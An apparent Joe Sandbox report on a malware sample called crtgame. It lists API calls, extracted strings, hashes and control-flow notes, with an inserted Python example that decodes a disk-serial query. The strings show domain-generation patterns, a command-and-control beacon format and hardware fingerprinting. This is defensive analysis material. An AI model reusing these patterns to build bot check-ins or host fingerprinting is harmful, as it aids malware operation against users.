                                                                              • HeapFree.KERNEL32(00000000,?,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A39
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: AllocHeap$FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 3499195154-0
                                                                              • Opcode ID: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
                                                                              • Instruction ID: 429f96408e1d6026f999a6daa987e4c74961ce2be0a7022420d0a9926faab586
                                                                              • Opcode Fuzzy Hash: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
                                                                              • Instruction Fuzzy Hash: E4116A702003019FC7218F28EE49E267BB9FB957217184A3AF1D2E71B0D7729961CF09

                                                                              Execution Graph

                                                                              Execution Coverage:10.9%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0.6%
                                                                              Total number of Nodes:351
                                                                              Total number of Limit Nodes:22
                                                                              APIs
                                                                              • RtlInitializeCriticalSection.NTDLL(02C573D8), ref: 02C25F43
                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C25F5A
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C25F63
                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C25F72
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C25F75
                                                                                • Part of subcall function 02C2F1E7: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02C2F235
                                                                                • Part of subcall function 02C2F1E7: CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02C2F256
                                                                                • Part of subcall function 02C2F1E7: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C2F26A
                                                                                • Part of subcall function 02C2F1E7: CloseHandle.KERNEL32(00000000), ref: 02C2F273
                                                                              • GetTickCount.KERNEL32 ref: 02C25FB6
                                                                              • GetVersionExA.KERNEL32(02C57030), ref: 02C25FE3
                                                                              • _malloc.LIBCMT ref: 02C2600D
                                                                              • _malloc.LIBCMT ref: 02C2601D
                                                                              • _malloc.LIBCMT ref: 02C2602B
                                                                              • _malloc.LIBCMT ref: 02C26036
                                                                              • _malloc.LIBCMT ref: 02C26041
                                                                              • _malloc.LIBCMT ref: 02C2604C
                                                                              • _malloc.LIBCMT ref: 02C26057
                                                                              • _malloc.LIBCMT ref: 02C26066
                                                                              • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C2607D
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02C26086
                                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C26095
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02C26098
                                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C260A3
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02C260A6
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C260E0
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C260ED
                                                                              • _malloc.LIBCMT ref: 02C26111
                                                                                • Part of subcall function 02C329AC: __FF_MSGBANNER.LIBCMT ref: 02C329C3
                                                                                • Part of subcall function 02C329AC: __NMSG_WRITE.LIBCMT ref: 02C329CA
                                                                                • Part of subcall function 02C329AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02C329EF
                                                                              • _malloc.LIBCMT ref: 02C2611F
                                                                              • _malloc.LIBCMT ref: 02C26126
                                                                              • _malloc.LIBCMT ref: 02C2614A
                                                                              • QueryPerformanceCounter.KERNEL32(00000200), ref: 02C2615A
                                                                              • Sleep.KERNELBASE ref: 02C26168
                                                                              • _malloc.LIBCMT ref: 02C26174
                                                                              • _malloc.LIBCMT ref: 02C26181
                                                                              • Sleep.KERNELBASE(00001388), ref: 02C261C2
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C261CD
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C261DE
                                                                              • GetTickCount.KERNEL32 ref: 02C262E5
                                                                              • wsprintfA.USER32 ref: 02C26C3B
                                                                              • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02C26D3D
                                                                              • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02C26D65
                                                                              • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02C26D7D
                                                                              • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02C26D95
                                                                              • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200,00000000), ref: 02C26DBE
                                                                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02C26DDD
                                                                              • InternetCloseHandle.WININET(00000000), ref: 02C26DF7
                                                                              • InternetCloseHandle.WININET(00000000), ref: 02C26E02
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C26E72
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C26E83
                                                                              • _malloc.LIBCMT ref: 02C26F0A
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C26F1C
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C26F28
                                                                              • _malloc.LIBCMT ref: 02C26FFC
                                                                              • _strtok.LIBCMT ref: 02C2702D
                                                                              • _swscanf.LIBCMT ref: 02C27044
                                                                              • _strtok.LIBCMT ref: 02C2705B
                                                                              • Sleep.KERNEL32(000007D0), ref: 02C27162
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C271E3
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C271F5
                                                                              • _sprintf.LIBCMT ref: 02C2728A
                                                                              • RtlEnterCriticalSection.NTDLL(00000020), ref: 02C2734E
                                                                              • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C27382
                                                                                • Part of subcall function 02C25D1D: _malloc.LIBCMT ref: 02C25D2B
                                                                              • _malloc.LIBCMT ref: 02C27583
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _malloc$CriticalSection$Internet$Heap$EnterLeave$Handle$Allocate$CloseFileOptionProcessSleep$AddressCountModuleOpenProcTick_strtok$CounterCreateDirectoryInitializePerformanceQueryReadTimeVersionWindows_sprintf_swscanfwsprintf
                                                                              • String ID: $%d;$/click/?counter=$<htm$Host: %s$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$a%c%c%c%c%c%c.ru$auth_ip$auth_swith$b%c%c%c%c%c%c.com$block$c%c%c%c%c%c%c.net$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$connect$d%c%c%c%c%c%c.info$disconnect$e%c%c%c%c%c%c.ua$f%c%c%c%c%c%c.ru$g%c%c%c%c%c%c.com$gR$h%c%c%c%c%c%c.net$http://$i%c%c%c%c%c%c.info$i4hiea56#7b&dfw3$idle$j%c%c%c%c%c%c.info$k%c%c%c%c%c%c.ua$l%c%c%c%c%c%c.ru$m%c%c%c%c%c%c.com$n%c%c%c%c%c%c.net$ntdll.dll$o%c%c%c%c%c%c.info$p%c%c%c%c%c%c.ua$q%c%c%c%c%c%c.ru$r%c%c%c%c%c%c.com$s%c%c%c%c%c%c.net$sprintf$strcat$t%c%c%c%c%c%c.info$u%c%c%c%c%c%c.ua$updips$updurls$urls$v%c%c%c%c%c%c.ru$w%c%c%c%c%c%c.com$x%c%c%c%c%c%c.net$y%c%c%c%c%c%c.info$z%c%c%c%c%c%c.ua
                                                                              • API String ID: 3871695393-3981972013
                                                                              • Opcode ID: 2f2a593e38ddbec710fe1fdb018efa569936ab9a2662381bc09b6a061ab1b9de
                                                                              • Instruction ID: 5bd636ab58e426e902a9c27b032de07990ea9b11ff7484ceb6dd8282c8d7446e
                                                                              • Opcode Fuzzy Hash: 2f2a593e38ddbec710fe1fdb018efa569936ab9a2662381bc09b6a061ab1b9de
                                                                              • Instruction Fuzzy Hash: DDD21CB36187A05ED315AB2C9C80B7FFBDC6B89704F59093DF5D5C6142CA28C609CBA2

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02C2F3B6
                                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C2F3CF
                                                                              • GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02C2F3F4
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 02C2F47D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                              • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                              • API String ID: 514930453-3114217049
                                                                              • Opcode ID: b34d4a0ec53ce6848d5f65b8b7646d330071a7dc33a8ee9ab6ab5d1feabb1f7c
                                                                              • Instruction ID: a78fba5957072e23f505b07cf8bcc2892b2e81eb30b354726a67b8739e3c2400
                                                                              • Opcode Fuzzy Hash: b34d4a0ec53ce6848d5f65b8b7646d330071a7dc33a8ee9ab6ab5d1feabb1f7c
                                                                              • Instruction Fuzzy Hash: A621E671E0021DABDB10DBA8D840BEEBBF8BF48304F1441ADD545E7601DFB09A49CBA0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000,00000000,505C3A43,00000000), ref: 02C22BE4
                                                                              • WSARecv.WS2_32(?,?,00000002,?,?,00000000,00000000), ref: 02C22C07
                                                                                • Part of subcall function 02C29E92: WSAGetLastError.WS2_32(?,00000080,00000017,02C23114), ref: 02C29EA0
                                                                              • WSASetLastError.WS2_32(?,?,?,?,00000000), ref: 02C22CD3
                                                                              • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02C22CE7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Recvselect
                                                                              • String ID: 3'
                                                                              • API String ID: 886190287-280543908
                                                                              • Opcode ID: 24d5196e0f6e908e7ed2e7e61014b9e39fd74726cd5946350c1e56d28cac2315
                                                                              • Instruction ID: 5ddd2518b54caa154688af2df3c966ab252acea1f40602a22d05014edf56077d
                                                                              • Opcode Fuzzy Hash: 24d5196e0f6e908e7ed2e7e61014b9e39fd74726cd5946350c1e56d28cac2315
                                                                              • Instruction Fuzzy Hash: 424169B29043159FDB21AF65C90476BBBE9EF84314F104D1EE89987281EFB4D548CBA2

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02C2F2BB
                                                                              • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02C2F2F9
                                                                              • GetLastError.KERNEL32 ref: 02C2F35A
                                                                              • CloseHandle.KERNELBASE(?), ref: 02C2F391
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                              • String ID: \\.\PhysicalDrive0
                                                                              • API String ID: 4026078076-1180397377
                                                                              • Opcode ID: 4775a730ba56492620b6f12929778c9791cac305f6d1e3f9eb30d3c411d06561
                                                                              • Instruction ID: d836136905bd0fd7d249670f7812571ca7a5c316b9793c83d57049ea69fdc241
                                                                              • Opcode Fuzzy Hash: 4775a730ba56492620b6f12929778c9791cac305f6d1e3f9eb30d3c411d06561
                                                                              • Instruction Fuzzy Hash: B631A371E0022DEBDB24DF95D984BAEBBB8EF89714F10416DE509A7680DB745B08CBD0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C21D11
                                                                              • GetLastError.KERNEL32 ref: 02C21D23
                                                                                • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C21D59
                                                                              • GetLastError.KERNEL32 ref: 02C21D6B
                                                                              • __beginthreadex.LIBCMT ref: 02C21DB1
                                                                              • GetLastError.KERNEL32 ref: 02C21DC6
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C21DDD
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C21DEC
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C21E14
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 02C21E1B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                              • String ID: thread$thread.entry_event$thread.exit_event
                                                                              • API String ID: 831262434-3017686385
                                                                              • Opcode ID: 973cd281545e6cb044c46322a0b1c55869e2c3715a33049aa90125e393942fda
                                                                              • Instruction ID: 22705e675f5ab23f464d34b133cc5a09bf70593ac2b9aa8aa092e4989ac35be7
                                                                              • Opcode Fuzzy Hash: 973cd281545e6cb044c46322a0b1c55869e2c3715a33049aa90125e393942fda
                                                                              • Instruction Fuzzy Hash: 0A31AD769003109FD711EF24C848B2BBBE5EB84710F144A2DF8498B291DBB19D49CFD2

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 02C25C48
                                                                                • Part of subcall function 02C329AC: __FF_MSGBANNER.LIBCMT ref: 02C329C3
                                                                                • Part of subcall function 02C329AC: __NMSG_WRITE.LIBCMT ref: 02C329CA
                                                                                • Part of subcall function 02C329AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02C329EF
                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000,?,?,?,00000000), ref: 02C25C68
                                                                              • lstrcpyW.KERNEL32(C:\ProgramData\rc.dat,00000000,?,?,?,00000000), ref: 02C25C70
                                                                              • lstrcatW.KERNEL32(C:\ProgramData\rc.dat,\ts.dat,?,?,?,00000000), ref: 02C25C7C
                                                                              • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,80000000,00000000,00000000,00000003,00000020,00000000,?,?,?,00000000), ref: 02C25C95
                                                                              • ReadFile.KERNEL32(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C25CAA
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 02C25CB1
                                                                              • __time64.LIBCMT ref: 02C25CC5
                                                                              • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,40000000,00000000,00000000,00000002,00000022,00000000,?,?,?,00000000), ref: 02C25CE2
                                                                              • WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C25CF7
                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02C25CFE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandle$AllocateFolderHeapPathReadSpecialWrite__time64_malloclstrcatlstrcpy
                                                                              • String ID: C:\ProgramData\rc.dat$\ts.dat
                                                                              • API String ID: 49968893-2903805982
                                                                              • Opcode ID: 9182b67db5289309a926dd657f14a995be0bf072d6339cac1419bf261a37c4d3
                                                                              • Instruction ID: fd5e59b67316ff85d46a4bbd9b7e3e53a31e1fc2e5e7002c86949f051fc22244
                                                                              • Opcode Fuzzy Hash: 9182b67db5289309a926dd657f14a995be0bf072d6339cac1419bf261a37c4d3
                                                                              • Instruction Fuzzy Hash: F92128759402187FE3106BA4AC88FAFFBACDB45764F004665F909A31C0DB706D4D8BA1

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C24CB6
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24CE2
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24CEE
                                                                                • Part of subcall function 02C24B18: __EH_prolog.LIBCMT ref: 02C24B1D
                                                                                • Part of subcall function 02C24B18: InterlockedExchange.KERNEL32(?,00000000), ref: 02C24C1D
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24DBE
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24DC4
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24DCB
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24DD1
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24FD2
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24FD8
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24FE3
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24FEC
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                              • String ID:
                                                                              • API String ID: 2062355503-0
                                                                              • Opcode ID: 5bbd14d403a5867e3891ccf04794e6a12a23ae736b010ba4da5999c1685d2a0a
                                                                              • Instruction ID: a0ef6d3f9a14619b025521645664cd1928ef2a0a123b5807542d535a4f5e0dff
                                                                              • Opcode Fuzzy Hash: 5bbd14d403a5867e3891ccf04794e6a12a23ae736b010ba4da5999c1685d2a0a
                                                                              • Instruction Fuzzy Hash: 50B14971D0026DDFDF25DF94C840BEEBBB5AF44314F10419AE80976280DBB56A89CFA6

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C22706
                                                                              • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C2272B
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C45553), ref: 02C22738
                                                                                • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                                              • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C22778
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C227D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                              • String ID: timer
                                                                              • API String ID: 4293676635-1792073242
                                                                              • Opcode ID: 626acf4403da3557ee8b992e544865d79c94b7f9cfd312a050fefaa8d916d773
                                                                              • Instruction ID: b6b8c680e261661e69d545c8081dec970220368e842b8c74085bb0fda89a59c7
                                                                              • Opcode Fuzzy Hash: 626acf4403da3557ee8b992e544865d79c94b7f9cfd312a050fefaa8d916d773
                                                                              • Instruction Fuzzy Hash: FE317EB2909715AFD310DF65D944B17BBE8FB48B24F004A2EF85583A80DB70E918CF92

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 02C2F29C: CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02C2F2BB
                                                                                • Part of subcall function 02C2F29C: DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02C2F2F9
                                                                                • Part of subcall function 02C2F29C: GetLastError.KERNEL32 ref: 02C2F35A
                                                                                • Part of subcall function 02C2F29C: CloseHandle.KERNELBASE(?), ref: 02C2F391
                                                                                • Part of subcall function 02C2F3A0: LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02C2F3B6
                                                                                • Part of subcall function 02C2F3A0: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C2F3CF
                                                                                • Part of subcall function 02C2F3A0: GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02C2F3F4
                                                                                • Part of subcall function 02C2F3A0: FreeLibrary.KERNEL32(00000000), ref: 02C2F47D
                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02C2F235
                                                                              • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02C2F256
                                                                              • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C2F26A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C2F273
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleLibrary$AdaptersAddressControlDeviceDirectoryErrorFreeInfoLastLoadProcTimeWindows
                                                                              • String ID: tLVh
                                                                              • API String ID: 1378705229-319918027
                                                                              • Opcode ID: a3bfa404f34c5709ae8378ee101603c7aa1f919e2c9ac0080dcec186dc6f4651
                                                                              • Instruction ID: 675e780ef15377b32b11b600a98fbbfa6158cd4e2869fc32d265bc60a145ff6a
                                                                              • Opcode Fuzzy Hash: a3bfa404f34c5709ae8378ee101603c7aa1f919e2c9ac0080dcec186dc6f4651
                                                                              • Instruction Fuzzy Hash: 3B113375D4132C6BDB20DBA5DC48FDEBB7DAB49710F000619E509A7184DBB05A4DCBD0
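The subcall at 02C2F29C above opens \\.\PhysicalDrive0 and issues DeviceIoControl with control code 0x2D1400, a 12-byte input buffer and a 0x400-byte output buffer; the same function then calls GetAdaptersInfo and reads the timestamp of the Windows directory, the usual ingredients of a host fingerprint. The following is an added example (not code from the sample or from the Joe Sandbox report) that decodes the control code with the Windows CTL_CODE layout, builds the 12-byte STORAGE_PROPERTY_QUERY that matches the observed input length, and parses a STORAGE_DEVICE_DESCRIPTOR response to pull out the disk serial. The report does not show the contents of the input buffer, so PropertyId = StorageDeviceProperty is an assumption (it is the query that returns the serial number); the response buffer is constructed inline so the code runs offline.

```python
"""Decode the DeviceIoControl call from subcall 02C2F29C and parse the storage
descriptor it requests.  Added example, not code from the sample or the report."""
import struct

# Windows CTL_CODE(DeviceType, Function, Method, Access):
#   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
def decode_ioctl(code: int) -> dict:
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access":      (code >> 14) & 0x3,
        "function":    (code >> 2) & 0xFFF,
        "method":      code & 0x3,
    }

FILE_DEVICE_MASS_STORAGE = 0x2D   # IOCTL_STORAGE_BASE
METHOD_BUFFERED = 0
FILE_ANY_ACCESS = 0

def is_storage_query_property(code: int) -> bool:
    """True when code == IOCTL_STORAGE_QUERY_PROPERTY (0x2D1400)."""
    d = decode_ioctl(code)
    return (d["device_type"] == FILE_DEVICE_MASS_STORAGE
            and d["function"] == 0x500
            and d["method"] == METHOD_BUFFERED
            and d["access"] == FILE_ANY_ACCESS)

# STORAGE_PROPERTY_QUERY: DWORD PropertyId, DWORD QueryType, BYTE AdditionalParameters[1],
# padded to 12 bytes, which is the 0x0000000C input length seen in the call.
StorageDeviceProperty = 0   # assumption: the query that yields vendor/product/serial
PropertyStandardQuery = 0

def build_storage_property_query() -> bytes:
    return struct.pack("<IIB3x", StorageDeviceProperty, PropertyStandardQuery, 0)

# STORAGE_DEVICE_DESCRIPTOR fixed part (string offsets are relative to buffer start):
#   0 Version, 4 Size, 8 DeviceType, 9 DeviceTypeModifier, 10 RemovableMedia,
#   11 CommandQueueing, 12 VendorIdOffset, 16 ProductIdOffset,
#   20 ProductRevisionOffset, 24 SerialNumberOffset, 28 BusType, 32 RawPropertiesLength
_HDR = struct.Struct("<IIBBBBIIIIII")   # 36 bytes

def _cstr_at(buf: bytes, off: int) -> str:
    """Read a NUL-terminated ASCII string at offset; 0 means 'field absent'."""
    if off == 0 or off >= len(buf):
        return ""
    end = buf.find(b"\x00", off)
    if end == -1:
        end = len(buf)
    return buf[off:end].decode("ascii", "replace").strip()

def parse_storage_device_descriptor(buf: bytes) -> dict:
    if len(buf) < _HDR.size:
        raise ValueError("buffer shorter than STORAGE_DEVICE_DESCRIPTOR header")
    (_version, _size, _dev_type, _dev_mod, removable, _cmdq,
     vend_off, prod_off, rev_off, serial_off, bus, _raw_len) = _HDR.unpack_from(buf)
    return {
        "vendor":    _cstr_at(buf, vend_off),
        "product":   _cstr_at(buf, prod_off),
        "revision":  _cstr_at(buf, rev_off),
        "serial":    _cstr_at(buf, serial_off),
        "bus_type":  bus,          # 11 == BusTypeSata
        "removable": bool(removable),
    }

def make_sample_descriptor(serial: str, product: str = "ExampleDisk") -> bytes:
    """Constructed response shaped like the 0x400-byte output buffer the sample
    hands to DeviceIoControl; vendor and revision offsets are left at 0 (absent)."""
    strings = product.encode() + b"\x00"
    prod_off = _HDR.size
    serial_off = _HDR.size + len(strings)
    strings += serial.encode() + b"\x00"
    hdr = _HDR.pack(1, _HDR.size + len(strings), 0, 0, 0, 0,
                    0, prod_off, 0, serial_off, 11, 0)
    return (hdr + strings).ljust(0x400, b"\x00")

if __name__ == "__main__":
    print(decode_ioctl(0x2D1400), is_storage_query_property(0x2D1400))
    print(build_storage_property_query().hex())
    print(parse_storage_device_descriptor(make_sample_descriptor("WD-1234567890")))
```

On a live host the serial string is what a real STORAGE_DEVICE_DESCRIPTOR returns through the same IOCTL, so the parser can be reused on a buffer captured from a sandbox or a debugger; the decoder is also a quick way to check other DeviceIoControl codes seen in a trace against the CTL_CODE fields rather than memorising constants.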

                                                                              Control-flow Graph (basic blocks with successors; the executed / not executed shading of the graph image is not preserved in text)
                                                                              • 601 2c21ba7-2c21bcf: call 2c44df0, RtlEnterCriticalSection -> 604, 605
                                                                              • 604 2c21bd1 -> 606
                                                                              • 605 2c21be9-2c21bf7: RtlLeaveCriticalSection, call 2c2dcbc -> 607
                                                                              • 606 2c21bd4-2c21be0: call 2c21b79 -> 613, 614
                                                                              • 607 2c21bfa-2c21c20: RtlEnterCriticalSection -> 609
                                                                              • 609 2c21c34-2c21c36 -> 611, 612
                                                                              • 611 2c21c22-2c21c2f: call 2c21b79 -> 616, 619
                                                                              • 612 2c21c38-2c21c43 -> 616
                                                                              • 613 2c21be2-2c21be7 -> 605, 606
                                                                              • 614 2c21c55-2c21c6e: RtlLeaveCriticalSection (no successors)
                                                                              • 616 2c21c45-2c21c4b -> 614, 618
                                                                              • 618 2c21c4d-2c21c51 -> 614
                                                                              • 619 2c21c31 -> 609
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C21BAC
                                                                              • RtlEnterCriticalSection.NTDLL ref: 02C21BBC
                                                                              • RtlLeaveCriticalSection.NTDLL ref: 02C21BEA
                                                                              • RtlEnterCriticalSection.NTDLL ref: 02C21C13
                                                                              • RtlLeaveCriticalSection.NTDLL ref: 02C21C56
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$H_prolog
                                                                              • String ID:
                                                                              • API String ID: 1633115879-0
                                                                              • Opcode ID: 396d01aa84ac9ecef63380985845c50a33022d061ca41cfc6b460a74526ddd18
